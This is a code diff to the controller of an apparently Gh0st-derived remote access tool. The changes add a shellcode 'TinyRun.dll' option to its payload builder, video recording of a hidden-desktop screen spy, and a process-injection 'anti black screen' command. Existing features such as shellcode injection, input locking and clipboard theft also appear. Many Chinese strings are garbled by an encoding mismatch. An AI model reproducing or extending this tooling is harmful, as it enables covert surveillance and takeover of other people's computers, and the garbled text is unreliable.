ENCODER_H264 = mmioFOURCC('X', '2', '6', '4'),
};
/************************************************************************
* @class CBmpToAvi
* @brief λͼתAVI֡
************************************************************************/
class CBmpToAvi
{
public:
CBmpToAvi();
virtual ~CBmpToAvi();
int Open(LPCTSTR szFile, LPBITMAPINFO lpbmi, int rate = 4, FCCHandler h = ENCODER_BMP);
bool Write(unsigned char* lpBuffer);
void Close();
static std::string GetErrMsg(int result) {
switch (result) {
case ERR_INVALID_PARAM:
return ("<EFBFBD><EFBFBD>Ч<EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
case ERR_NOT_SUPPORT:
return ("<EFBFBD><EFBFBD>֧<EFBFBD>ֵ<EFBFBD>λ<EFBFBD><EFBFBD><EFBFBD>ȣ<EFBFBD><EFBFBD><EFBFBD>Ҫ24λ<EFBFBD><EFBFBD>32λ");
case ERR_NO_ENCODER:
return ("δ<EFBFBD><EFBFBD>װx264<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> \n<EFBFBD><EFBFBD><EFBFBD>ص<EFBFBD>ַ<EFBFBD><EFBFBD>https://sourceforge.net/projects/x264vfw");
case ERR_INTERNAL:
return("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AVI<EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><EFBFBD>");
default:
return "succeed";
}
}
private:
FCCHandler m_fccHandler;
PAVIFILE m_pfile;
PAVISTREAM m_pavi;
int m_nFrames;
static AVISTREAMINFO m_si; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Ǿ<EFBFBD>̬<EFBFBD><CCAC>
int m_bitCount = 24;
int m_width = 1920;
int m_height = 1080;
int m_quality = 90;
HIC m_hic = NULL;
};

9
server/2015Remote/BuildDlg.cpp
View File

@@ -17,6 +17,7 @@ enum Index {
IndexTestRun_InjSC,
IndexGhost,
IndexServerDll,
IndexTinyRun,
OTHER_ITEM
};
@@ -196,6 +197,11 @@ void CBuildDlg::OnBnClickedOk()
typ = CLIENT_TYPE_DLL;
szBuffer = ReadResource(is64bit ? IDR_SERVERDLL_X64 : IDR_SERVERDLL_X86, dwFileSize);
break;
case IndexTinyRun:
file = "TinyRun.dll";
typ = CLIENT_TYPE_SHELLCODE;
szBuffer = ReadResource(is64bit ? IDR_TINYRUN_X64 : IDR_TINYRUN_X86, dwFileSize);
break;
case OTHER_ITEM: {
m_OtherItem.GetWindowTextA(file);
typ = -1;
@@ -235,7 +241,7 @@ void CBuildDlg::OnBnClickedOk()
return;
}
bool encrypt = m_strEncryptIP == _T("<EFBFBD><EFBFBD>");
if (encrypt && startup != Startup_InjSC)
if (encrypt && startup != Startup_InjSC && index != IndexTinyRun)
g_ConnectAddress.Encrypt();
try {
// <20><><EFBFBD>±<EFBFBD>ʶ
@@ -367,6 +373,7 @@ BOOL CBuildDlg::OnInitDialog()
m_ComboExe.InsertString(IndexGhost, "ghost.exe");
m_ComboExe.InsertString(IndexServerDll, "ServerDll.dll");
m_ComboExe.InsertString(IndexTinyRun, "TinyRun.dll");
m_ComboExe.InsertString(OTHER_ITEM, CString("ѡ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>"));
m_ComboExe.SetCurSel(IndexTestRun_MemDLL);

1
server/2015Remote/CPasswordDlg.cpp
View File

@@ -194,6 +194,7 @@ void CPwdGenDlg::OnBnClickedButtonGenkey()
std::string finalKey = deriveKey(password, m_sDeviceID.GetString());
std::string fixedKey = strBeginDate.GetString() + std::string("-") + strEndDate.GetBuffer() + std::string("-") + hostNum.GetString() + "-" +
getFixedLengthID(finalKey);
m_sPassword = fixedKey.c_str();
m_EditPassword.SetWindowTextA(fixedKey.c_str());
std::string hardwareID = getHardwareID();
std::string hashedID = hashSHA256(hardwareID);

89
server/2015Remote/HideScreenSpyDlg.cpp
View File

@@ -12,6 +12,8 @@
#define new DEBUG_NEW
#endif
#define TIMER_ID 132
/////////////////////////////////////////////////////////////////////////////
// CHideScreenSpyDlg dialog
enum {
@@ -33,10 +35,14 @@ enum {
IDM_FPS_20,
IDM_FPS_25,
IDM_FPS_30,
IDM_SAVEAVI_H264 = 996,
};
IMPLEMENT_DYNAMIC(CHideScreenSpyDlg, CDialog)
bool DirectoryExists(const char* path);
std::string GetScreenShotPath(CWnd* parent, const CString& ip, const CString& filter, const CString& suffix);
CHideScreenSpyDlg::CHideScreenSpyDlg(CWnd* pParent, Server* pIOCPServer, ClientContext* pContext)
: DialogBase(CHideScreenSpyDlg::IDD, pParent, pIOCPServer, pContext, IDI_SCREENSYP)
{
@@ -61,11 +67,7 @@ CHideScreenSpyDlg::~CHideScreenSpyDlg()
m_ContextObject->GetServer()->Disconnect(m_ContextObject);
DestroyIcon(m_hIcon);
Sleep(200);
if (!m_aviFile.IsEmpty()) {
KillTimer(132);
m_aviFile = "";
m_aviStream.Close();
}
::ReleaseDC(m_hWnd, m_hFullDC);
DeleteDC(m_hFullMemDC);
DeleteObject(m_BitmapHandle);
@@ -95,6 +97,11 @@ END_MESSAGE_MAP()
// CHideScreenSpyDlg message handlers
void CHideScreenSpyDlg::OnClose()
{
if (!m_aviFile.IsEmpty()) {
KillTimer(TIMER_ID);
m_aviFile = "";
m_aviStream.Close();
}
CancelIO();
// 等待数据处理完毕
if (IsProcessing()) {
@@ -137,33 +144,13 @@ void CHideScreenSpyDlg::OnReceiveComplete()
bool CHideScreenSpyDlg::SaveSnapshot()
{
CString strFileName = m_IPAddress + CTime::GetCurrentTime().Format(_T("_%Y-%m-%d_%H-%M-%S.bmp"));
CFileDialog dlg(FALSE, _T("bmp"), strFileName, OFN_OVERWRITEPROMPT, _T("位图文件(*.bmp)|*.bmp|"), this);
if (dlg.DoModal() != IDOK)
return false;
auto path = GetScreenShotPath(this, m_IPAddress, "位图文件(*.bmp)|*.bmp|", "bmp");
if (path.empty())
return FALSE;
BITMAPFILEHEADER hdr;
LPBITMAPINFO lpbi = m_BitmapInfor_Full;
CFile file;
if (!file.Open(dlg.GetPathName(), CFile::modeWrite | CFile::modeCreate)) {
MessageBox(_T("文件保存失败:\n") + dlg.GetPathName(), "提示");
return false;
}
// BITMAPINFO大小
int nbmiSize = sizeof(BITMAPINFOHEADER) + (lpbi->bmiHeader.biBitCount > 16 ? 1 : (1 << lpbi->bmiHeader.biBitCount)) * sizeof(RGBQUAD);
// Fill in the fields of the file header
hdr.bfType = ((WORD)('M' << 8) | 'B'); // is always "BM"
hdr.bfSize = lpbi->bmiHeader.biSizeImage + sizeof(hdr);
hdr.bfReserved1 = 0;
hdr.bfReserved2 = 0;
hdr.bfOffBits = sizeof(hdr) + nbmiSize;
// Write the file header
file.Write(&hdr, sizeof(hdr));
file.Write(lpbi, nbmiSize);
// Write the DIB header and the bits
file.Write(m_BitmapData_Full, lpbi->bmiHeader.biSizeImage);
file.Close();
return true;
WriteBitmap(m_BitmapInfor_Full, m_BitmapData_Full, path.c_str());
return true;
}
BOOL CHideScreenSpyDlg::OnInitDialog()
@@ -185,7 +172,8 @@ BOOL CHideScreenSpyDlg::OnInitDialog()
pSysMenu->AppendMenu(MF_STRING, IDM_SET_FLUSH, _T("刷新(&F)"));
pSysMenu->AppendMenu(MF_STRING, IDM_CONTROL, _T("控制屏幕(&Y)"));
pSysMenu->AppendMenu(MF_STRING, IDM_SAVEDIB, _T("保存快照(&S)"));
pSysMenu->AppendMenu(MF_STRING, IDM_SAVEAVI_S, _T("保存录像(&A)"));
pSysMenu->AppendMenu(MF_STRING, IDM_SAVEAVI_S, _T("录像(MJPEG)"));
pSysMenu->AppendMenu(MF_STRING, IDM_SAVEAVI_H264, _T("录像(H264)"));
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_GET_CLIPBOARD, _T("获取剪贴板(&R)"));
pSysMenu->AppendMenu(MF_STRING, IDM_SET_CLIPBOARD, _T("设置剪贴板(&L)"));
@@ -463,35 +451,28 @@ void CHideScreenSpyDlg::OnSysCommand(UINT nID, LPARAM lParam)
case IDM_SAVEDIB:
SaveSnapshot();
break;
case IDM_SAVEAVI_S: {
case IDM_SAVEAVI_S: case IDM_SAVEAVI_H264: {
if (pSysMenu->GetMenuState(IDM_SAVEAVI_S, MF_BYCOMMAND) & MF_CHECKED) {
KillTimer(132);
KillTimer(TIMER_ID);
pSysMenu->CheckMenuItem(IDM_SAVEAVI_S, MF_UNCHECKED);
pSysMenu->EnableMenuItem(IDM_SAVEAVI_S, MF_ENABLED);
pSysMenu->EnableMenuItem(IDM_SAVEAVI_H264, MF_ENABLED);
m_aviFile = "";
m_aviStream.Close();
return;
}
if (m_BitmapInfor_Full->bmiHeader.biBitCount <= 15) {
MessageBox(_T("不支持16位及以下颜色录像!"), "提示");
return;
}
CString strFileName = m_IPAddress + CTime::GetCurrentTime().Format(_T("_%Y-%m-%d_%H-%M-%S.avi"));
CFileDialog dlg(FALSE, _T("avi"), strFileName, OFN_OVERWRITEPROMPT, _T("Video(*.avi)|*.avi|"), this);
if (dlg.DoModal() != IDOK)
return;
m_aviFile = dlg.GetPathName();
if (!m_aviStream.Open(m_hWnd, m_aviFile, m_BitmapInfor_Full)) {
MessageBox(_T("Create Video(*.avi) Failed:\n") + m_aviFile, "提示");
m_aviFile = GetScreenShotPath(this, m_IPAddress, "Video(*.avi)|*.avi|", "avi").c_str();
const int duration = 250, rate = 1000 / duration;
FCCHandler handler = nID == IDM_SAVEAVI_S ? ENCODER_MJPEG : ENCODER_H264;
int code;
if (code = m_aviStream.Open(m_aviFile, m_BitmapInfor_Full, rate, handler)) {
MessageBox(CString("Create Video(*.avi) Failed:\n") + m_aviFile + "\r\n错误代码: " +
CBmpToAvi::GetErrMsg(code).c_str(), "提示");
m_aviFile = _T("");
} else {
::SetTimer(m_hWnd, 132, 250, NULL);
pSysMenu->CheckMenuItem(IDM_SAVEAVI_S, MF_CHECKED);
::SetTimer(m_hWnd, TIMER_ID, duration, NULL);
pSysMenu->CheckMenuItem(nID, MF_CHECKED);
pSysMenu->EnableMenuItem(nID == IDM_SAVEAVI_S ? IDM_SAVEAVI_H264 : IDM_SAVEAVI_S, MF_DISABLED);
}
}
break;
@@ -886,7 +867,7 @@ void CHideScreenSpyDlg::OnTimer(UINT_PTR nIDEvent)
if (!m_aviFile.IsEmpty()) {
LPCTSTR lpTipsString = _T("");
m_aviStream.Write(m_BitmapData_Full);
m_aviStream.Write((BYTE*)m_BitmapData_Full);
// 提示正在录像
SetTextColor(m_hFullDC, RGB(0xff, 0x00, 0x00));

23
server/2015Remote/RegisterDlg.cpp
View File

@@ -261,40 +261,41 @@ void CRegisterDlg::AddKey(char* szBuffer)
szTemp+=sizeof(BYTE);
char* szValueName=szTemp; //ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
szTemp+=msg.size;
BYTE* szValueDate=(BYTE*)szTemp; //ȡ<><C8A1>ֵ
BYTE* szValueData=(BYTE*)szTemp; //ȡ<><C8A1>ֵ
szTemp+=msg.valsize;
if(Type==MREG_SZ) {
int iItem=m_ControlList.InsertItem(0,szValueName,0);
m_ControlList.SetItemText(iItem,1,"REG_SZ");
m_ControlList.SetItemText(iItem,2,(char*)szValueDate);
m_ControlList.SetItemText(iItem,2,(char*)szValueData);
}
if(Type==MREG_DWORD) {
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD> REG_DWORD <20><><EFBFBD>͵Ĵ<CDB5><C4B4><EFBFBD>
char ValueDate[256] = {0};
INT_PTR d=(INT_PTR)szValueDate;
memcpy((void*)&d,szValueDate,sizeof(INT_PTR));
char ValueData[256] = {0};
INT_PTR d=(INT_PTR)szValueData;
memcpy((void*)&d,szValueData,sizeof(INT_PTR));
CString strValue;
strValue.Format("0x%x",d);
sprintf(ValueDate," (%d)",d);
sprintf(ValueData," (%d)",d);
strValue+=" ";
strValue+=ValueDate;
strValue+=ValueData;
int iItem=m_ControlList.InsertItem(0,szValueName,1);
m_ControlList.SetItemText(iItem,1,"REG_DWORD");
m_ControlList.SetItemText(iItem,2,strValue);
}
if(Type==MREG_BINARY) {
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD> REG_BINARY <20><><EFBFBD>͵Ĵ<CDB5><C4B4><EFBFBD>
char ValueDate[256] = {0};
sprintf(ValueDate,"%s",szValueDate);
char *ValueData = new char[msg.valsize+1];
sprintf(ValueData,"%s",szValueData);
int iItem=m_ControlList.InsertItem(0,szValueName,1);
m_ControlList.SetItemText(iItem,1,"REG_BINARY");
m_ControlList.SetItemText(iItem,2,ValueDate);
m_ControlList.SetItemText(iItem,2,ValueData);
SAFE_DELETE_AR(ValueData);
}
if(Type==MREG_EXPAND_SZ) {
int iItem=m_ControlList.InsertItem(0,szValueName,0);
m_ControlList.SetItemText(iItem,1,"REG_EXPAND_SZ");
m_ControlList.SetItemText(iItem,2,(char*)szValueDate);
m_ControlList.SetItemText(iItem,2,(char*)szValueData);
}
}
}

91
server/2015Remote/ScreenSpyDlg.cpp
View File

@@ -24,11 +24,14 @@ enum {
IDM_GET_CLIPBOARD, // 获取剪贴板
IDM_SET_CLIPBOARD, // 设置剪贴板
IDM_ADAPTIVE_SIZE,
IDM_SAVEAVI,
IDM_SAVEAVI_H264,
};
IMPLEMENT_DYNAMIC(CScreenSpyDlg, CDialog)
#define ALGORITHM_DIFF 1
#define TIMER_ID 132
#ifdef _WIN64
#ifdef _DEBUG
@@ -170,6 +173,7 @@ BEGIN_MESSAGE_MAP(CScreenSpyDlg, CDialog)
ON_WM_SIZE()
ON_WM_LBUTTONDBLCLK()
ON_WM_ACTIVATE()
ON_WM_TIMER()
END_MESSAGE_MAP()
@@ -220,7 +224,10 @@ BOOL CScreenSpyDlg::OnInitDialog()
SysMenu->AppendMenu(MF_STRING, IDM_ADAPTIVE_SIZE, "自适应窗口大小(&A)");
SysMenu->AppendMenu(MF_STRING, IDM_TRACE_CURSOR, "跟踪被控端鼠标(&T)");
SysMenu->AppendMenu(MF_STRING, IDM_BLOCK_INPUT, "锁定被控端鼠标和键盘(&L)");
SysMenu->AppendMenu(MF_SEPARATOR);
SysMenu->AppendMenu(MF_STRING, IDM_SAVEDIB, "保存快照(&S)");
SysMenu->AppendMenu(MF_STRING, IDM_SAVEAVI, _T("录像(MJPEG)"));
SysMenu->AppendMenu(MF_STRING, IDM_SAVEAVI_H264, _T("录像(H264)"));
SysMenu->AppendMenu(MF_SEPARATOR);
SysMenu->AppendMenu(MF_STRING, IDM_GET_CLIPBOARD, "获取剪贴板(&R)");
SysMenu->AppendMenu(MF_STRING, IDM_SET_CLIPBOARD, "设置剪贴板(&L)");
@@ -253,6 +260,11 @@ BOOL CScreenSpyDlg::OnInitDialog()
VOID CScreenSpyDlg::OnClose()
{
if (!m_aviFile.IsEmpty()) {
KillTimer(TIMER_ID);
m_aviFile = "";
m_aviStream.Close();
}
CancelIO();
// 恢复鼠标状态
SetClassLongPtr(m_hWnd, GCLP_HCURSOR, (LONG_PTR)LoadCursor(NULL, IDC_ARROW));
@@ -266,6 +278,7 @@ VOID CScreenSpyDlg::OnClose()
// 等待数据处理完毕
if (IsProcessing()) {
m_bHide = true;
ShowWindow(SW_HIDE);
return;
}
@@ -429,7 +442,7 @@ VOID CScreenSpyDlg::DrawNextScreenDiff(bool keyFrame)
}
#endif
if (bChange) {
if (bChange && !m_bHide) {
PostMessage(WM_PAINT);
}
}
@@ -519,6 +532,35 @@ VOID CScreenSpyDlg::DrawTipString(CString strString)
SetTextColor(m_hFullDC, OldBackgroundColor);
}
bool DirectoryExists(const char* path) {
DWORD attr = GetFileAttributesA(path);
return (attr != INVALID_FILE_ATTRIBUTES &&
(attr & FILE_ATTRIBUTE_DIRECTORY));
}
std::string GetScreenShotPath(CWnd *parent, const CString& ip, const CString &filter, const CString& suffix) {
std::string path;
std::string folder = THIS_CFG.GetStr("settings", "ScreenShot", "");
if (folder.empty() || !DirectoryExists(folder.c_str())) {
CString strFileName = ip + CTime::GetCurrentTime().Format(_T("_%Y%m%d%H%M%S.")) + suffix;
CFileDialog dlg(FALSE, suffix, strFileName, OFN_OVERWRITEPROMPT, filter, parent);
if (dlg.DoModal() != IDOK)
return "";
folder = dlg.GetFolderPath();
if (!folder.empty() && folder.back() != '\\') {
folder += '\\';
}
path = dlg.GetPathName();
THIS_CFG.SetStr("settings", "ScreenShot", folder);
}
else {
if (!folder.empty() && folder.back() != '\\') {
folder += '\\';
}
path = folder + std::string(ip) + "_" + ToPekingDateTime(0) + "." + std::string(suffix);
}
return path;
}
void CScreenSpyDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
@@ -541,6 +583,33 @@ void CScreenSpyDlg::OnSysCommand(UINT nID, LPARAM lParam)
SaveSnapshot();
break;
}
case IDM_SAVEAVI: case IDM_SAVEAVI_H264: {
if (SysMenu->GetMenuState(nID, MF_BYCOMMAND) & MF_CHECKED) {
KillTimer(TIMER_ID);
SysMenu->CheckMenuItem(nID, MF_UNCHECKED);
SysMenu->EnableMenuItem(IDM_SAVEAVI, MF_ENABLED);
SysMenu->EnableMenuItem(IDM_SAVEAVI_H264, MF_ENABLED);
m_aviFile = "";
m_aviStream.Close();
return;
}
m_aviFile = GetScreenShotPath(this, m_IPAddress, "Video(*.avi)|*.avi|", "avi").c_str();
const int duration = 250, rate = 1000 / duration;
FCCHandler handler = nID == IDM_SAVEAVI ? ENCODER_MJPEG : ENCODER_H264;
int code;
if (code = m_aviStream.Open(m_aviFile, m_BitmapInfor_Full, rate, handler)) {
MessageBox(CString("Create Video(*.avi) Failed:\n") + m_aviFile + "\r\n错误代码: " +
CBmpToAvi::GetErrMsg(code).c_str(), "提示");
m_aviFile = _T("");
}
else {
::SetTimer(m_hWnd, TIMER_ID, duration, NULL);
SysMenu->CheckMenuItem(nID, MF_CHECKED);
SysMenu->EnableMenuItem(nID == IDM_SAVEAVI ? IDM_SAVEAVI_H264 : IDM_SAVEAVI, MF_DISABLED);
}
break;
}
case IDM_TRACE_CURSOR: { // 跟踪被控端鼠标
m_bIsTraceCursor = !m_bIsTraceCursor; //这里在改变数据
SysMenu->CheckMenuItem(IDM_TRACE_CURSOR, m_bIsTraceCursor ? MF_CHECKED : MF_UNCHECKED);//在菜单打钩不打钩
@@ -580,6 +649,19 @@ void CScreenSpyDlg::OnSysCommand(UINT nID, LPARAM lParam)
CDialog::OnSysCommand(nID, lParam);
}
void CScreenSpyDlg::OnTimer(UINT_PTR nIDEvent)
{
if (!m_aviFile.IsEmpty()) {
LPCTSTR lpTipsString = _T("");
m_aviStream.Write((BYTE*)m_BitmapData_Full);
// 提示正在录像
SetTextColor(m_hFullDC, RGB(0xff, 0x00, 0x00));
TextOut(m_hFullDC, 0, 0, lpTipsString, lstrlen(lpTipsString));
}
CDialog::OnTimer(nIDEvent);
}
BOOL CScreenSpyDlg::PreTranslateMessage(MSG* pMsg)
{
@@ -660,12 +742,11 @@ VOID CScreenSpyDlg::SendCommand(const MYMSG* Msg)
BOOL CScreenSpyDlg::SaveSnapshot(void)
{
CString strFileName = m_IPAddress + CTime::GetCurrentTime().Format("_%Y-%m-%d_%H-%M-%S.bmp");
CFileDialog Dlg(FALSE, "bmp", strFileName, OFN_OVERWRITEPROMPT, "位图文件(*.bmp)|*.bmp|", this);
if(Dlg.DoModal () != IDOK)
auto path = GetScreenShotPath(this, m_IPAddress, "位图文件(*.bmp)|*.bmp|", "bmp");
if (path.empty())
return FALSE;
WriteBitmap(m_BitmapInfor_Full, m_BitmapData_Full, Dlg.GetPathName().GetBuffer());
WriteBitmap(m_BitmapInfor_Full, m_BitmapData_Full, path.c_str());
return true;
}

6
server/2015Remote/ScreenSpyDlg.h
View File

@@ -1,6 +1,7 @@
#pragma once
#include "IOCPServer.h"
#include "..\..\client\CursorInfo.h"
#include "VideoDlg.h"
extern "C"
{
@@ -74,6 +75,7 @@ public:
BOOL m_bSend;
ULONG m_ulMsgCount;
int m_FrameID;
bool m_bHide = false;
BOOL SaveSnapshot(void);
// <20>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
@@ -96,6 +98,10 @@ public:
double m_wZoom=1, m_hZoom=1;
bool m_bMouseTracking = false;
CString m_aviFile;
CBmpToAvi m_aviStream;
void OnTimer(UINT_PTR nIDEvent);
bool Decode(LPBYTE Buffer, int size);
void EnterFullScreen();
bool LeaveFullScreen();

46
server/2015Remote/SystemDlg.cpp
View File

@@ -16,6 +16,7 @@ typedef struct ItemData {
{
return Data[index];
}
CString Arch;
} ItemData;
IMPLEMENT_DYNAMIC(CSystemDlg, CDialog)
@@ -52,6 +53,7 @@ BEGIN_MESSAGE_MAP(CSystemDlg, CDialog)
ON_COMMAND(ID_WLIST_MAX, &CSystemDlg::OnWlistMax)
ON_COMMAND(ID_WLIST_MIN, &CSystemDlg::OnWlistMin)
ON_COMMAND(ID_PLIST_INJECT, &CSystemDlg::OnPlistInject)
ON_COMMAND(ID_PLIST_ANTI_BLACK_SCREEN, &CSystemDlg::OnPlistAntiBlackScreen)
END_MESSAGE_MAP()
@@ -75,6 +77,7 @@ BOOL CSystemDlg::OnInitDialog()
m_ControlList.InsertColumn(0, "ӳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>", LVCFMT_LEFT, 180);
m_ControlList.InsertColumn(1, "PID", LVCFMT_LEFT, 70);
m_ControlList.InsertColumn(2, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>", LVCFMT_LEFT, 320);
m_ControlList.InsertColumn(3, "<EFBFBD>ܹ<EFBFBD>", LVCFMT_LEFT, 70);
ShowProcessList(); //<2F><><EFBFBD>ڵ<EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ž<EFBFBD><C5BD>̵<EFBFBD><CCB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>԰<EFBFBD><D4B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ<EFBFBD><CABE><EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>\0\0
} else if (m_bHow==TOKEN_WSLIST) { //<2F><><EFBFBD>ڹ<EFBFBD><DAB9><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>б<EFBFBD>
//<2F><>ʼ<EFBFBD><CABC> <20><><EFBFBD>ڹ<EFBFBD><DAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD>
@@ -123,8 +126,8 @@ void CSystemDlg::ShowProcessList(void)
{
Buffer tmp = m_ContextObject->InDeCompressedBuffer.GetMyBuffer(1);
char *szBuffer = tmp.c_str(); //xiaoxi[][][][][]
char *szExeFile;
char *szProcessFullPath;
const char *szExeFile;
const char *szProcessFullPath;
DWORD dwOffset = 0;
CString str;
DeleteAllItems();
@@ -133,15 +136,17 @@ void CSystemDlg::ShowProcessList(void)
for (i = 0; dwOffset < m_ContextObject->InDeCompressedBuffer.GetBufferLength() - 1; ++i) {
LPDWORD PID = LPDWORD(szBuffer + dwOffset); //<2F><><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>ID
szExeFile = szBuffer + dwOffset + sizeof(DWORD); //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID֮<44><D6AE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
auto arr = StringToVector(szExeFile, ':', 2);
szProcessFullPath = szExeFile + lstrlen(szExeFile) + 1; //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǽ<EFBFBD><C7BD><EFBFBD><EFBFBD><EFBFBD>֮<EFBFBD><D6AE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹ<DDBD>Ĺ<EFBFBD><C4B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
m_ControlList.InsertItem(i, szExeFile); //<2F><><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݼ<EFBFBD><DDBC><EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>
m_ControlList.InsertItem(i, arr[0].c_str()); //<2F><><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݼ<EFBFBD><DDBC><EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>
str.Format("%5u", *PID);
m_ControlList.SetItemText(i, 1, str);
m_ControlList.SetItemText(i, 2, szProcessFullPath);
m_ControlList.SetItemText(i, 3, arr[1].empty() ? "N/A" : arr[1].c_str());
// ItemData Ϊ<><CEAA><EFBFBD><EFBFBD>ID
auto data = new ItemData{ *PID, {szExeFile, str, szProcessFullPath} };
auto data = new ItemData{ *PID, {arr[0].c_str(), str, szProcessFullPath}, arr[1].c_str() };
m_ControlList.SetItemData(i, DWORD_PTR(data));
dwOffset += sizeof(DWORD) + lstrlen(szExeFile) + lstrlen(szProcessFullPath) + 2; //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>ѭ<EFBFBD><D1AD>
@@ -484,3 +489,36 @@ void CSystemDlg::OnPlistInject()
ASSERT(m_pParent);
m_pParent->PostMessageA(WM_INJECT_SHELLCODE, (WPARAM)new std::string(m_ContextObject->PeerName), dwProcessID);
}
void CSystemDlg::OnPlistAntiBlackScreen()
{
CListCtrl* ListCtrl = NULL;
if (m_ControlList.IsWindowVisible())
ListCtrl = &m_ControlList;
else
return;
if (ListCtrl->GetSelectedCount() != 1)
::MessageBox(m_hWnd, "ֻ<EFBFBD><EFBFBD>ͬʱ<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD><EFBFBD>з<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!", "<EFBFBD><EFBFBD>ʾ", MB_ICONINFORMATION);
if (::MessageBox(m_hWnd, "ȷ<EFBFBD><EFBFBD>Ҫ<EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD><EFBFBD>з<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?\n<EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̡<EFBFBD>DLL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض˼ܹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͬ!",
"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>", MB_YESNO | MB_ICONQUESTION) == IDNO)
return;
DWORD dwOffset = 1, dwProcessID = 0;
POSITION Pos = ListCtrl->GetFirstSelectedItemPosition();
CString arch;
if (Pos) {
int nItem = ListCtrl->GetNextSelectedItem(Pos);
auto data = (ItemData*)ListCtrl->GetItemData(nItem);
dwProcessID = data->ID;
arch = data->Arch;
dwOffset += sizeof(DWORD);
}
ASSERT(m_pParent);
char *arg = new char[300]();
memcpy(arg, m_ContextObject->PeerName.c_str(), m_ContextObject->PeerName.length());
memcpy(arg + 256, arch, arch.GetLength());
m_pParent->PostMessageA(WM_ANTI_BLACKSCREEN, (WPARAM)arg, dwProcessID);
}

1
server/2015Remote/SystemDlg.h
View File

@@ -47,4 +47,5 @@ public:
afx_msg void OnWlistMin();
afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnPlistInject();
afx_msg void OnPlistAntiBlackScreen();
};

66
server/2015Remote/VideoDlg.cpp
View File

@@ -15,67 +15,6 @@ enum {
IMPLEMENT_DYNAMIC(CVideoDlg, CDialog)
AVISTREAMINFO CBmpToAvi::m_si;
CBmpToAvi::CBmpToAvi()
{
m_pfile = NULL;
m_pavi = NULL;
AVIFileInit();
}
CBmpToAvi::~CBmpToAvi()
{
AVIFileExit();
}
bool CBmpToAvi::Open( LPCTSTR szFile, LPBITMAPINFO lpbmi )
{
if (szFile == NULL)
return false;
m_nFrames = 0;
if (AVIFileOpen(&m_pfile, szFile, OF_WRITE | OF_CREATE, NULL))
return false;
m_si.fccType = streamtypeVIDEO;
m_si.fccHandler = BI_RGB;
m_si.dwScale = 1;
m_si.dwRate = 8; // ֡<><D6A1>
SetRect(&m_si.rcFrame, 0, 0, lpbmi->bmiHeader.biWidth, lpbmi->bmiHeader.biHeight);
m_si.dwSuggestedBufferSize = lpbmi->bmiHeader.biSizeImage;
if (AVIFileCreateStream(m_pfile, &m_pavi, &m_si))
return false;
if (AVIStreamSetFormat(m_pavi, 0, lpbmi, sizeof(BITMAPINFO)) != AVIERR_OK)
return false;
return true;
}
bool CBmpToAvi::Write(LPVOID lpBuffer)
{
if (m_pfile == NULL || m_pavi == NULL)
return false;
